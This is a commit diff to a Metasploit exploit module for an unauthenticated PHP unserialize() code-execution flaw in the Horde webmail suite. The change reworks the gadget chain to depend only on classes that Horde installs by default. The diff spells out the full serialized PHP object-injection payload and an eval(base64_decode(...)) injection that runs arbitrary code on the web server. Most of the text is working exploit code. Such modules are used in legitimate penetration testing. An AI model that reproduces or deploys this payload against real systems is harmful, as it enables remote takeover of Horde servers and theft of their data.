Switch exploitation technique to use default available classes

modules/exploits/unix/webapp/horde_unserialize_exec.rb

@@ -14,17 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Horde Unserialize PHP Code Execution',
       'Description'    => %q{
-        This module exploits a php unserialize() vulnerability in Horde < 5.1.1 which could be
+        This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
         abused to allow unauthenticated users to execute arbitrary code with the permissions of
         the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
         The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
-        class to reach a dangerous call_user_func() call in the Horde_Prefs class. This exploit
-        uses the Horde_Date_Parser_Token class, which isn't installed by default, the package
-        Horde_Date_Parser must be installed in the target.
+        class to reach a dangerous call_user_func() call in the Horde_Prefs class.
       },
       'Author'         =>
         [
-          'EgiX', # Vulnerability discovery and PoC
+          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
           'juan vazquez' # Metasploit module
         ],
       'License'        => MSF_LICENSE,
@@ -53,10 +51,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    addends = [rand(10000), rand(10000)]
-    sum = addends.inject{|sum,x| sum + x }
-    res = send_request_exploit("echo #{addends[0]} + #{addends[1]};die;")
-    if res and res.body and res.body.to_s =~ /#{sum}/
+    flag = rand_text_alpha(rand(10)+20)
+    res = send_request_exploit("print #{flag};die;")
+    if res and res.body and res.body.to_s =~ /#{flag}/
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
@@ -73,15 +70,13 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def send_request_exploit(p)
-    php_injection = "\"&&eval(base64_decode($_SERVER[HTTP_CMD]))==\""
+    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"
 
-    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";O:20:\""
-    payload_serialized << "Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
-    payload_serialized << "a:2:{i:0;O:23:\"Horde_Date_Parser_Token\":1:{s:4:\"tags\";a:1:{i:0;s:1:\"A\";}}i:1;s:5:\"untag\";}}"
-    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";"
-    payload_serialized << "a:1:{s:#{php_injection.length}:\"#{php_injection}\";i:1;}}}}s:13:\"\x00*\x00_prefnames\";"
-    payload_serialized << "a:1:{s:10:\"identities\";s:#{php_injection.length}:\"#{php_injection}\";}}"
-    payload_serialized << "s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
+    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
+    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
+    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
+    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
+    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
 
     send_request_cgi(
       {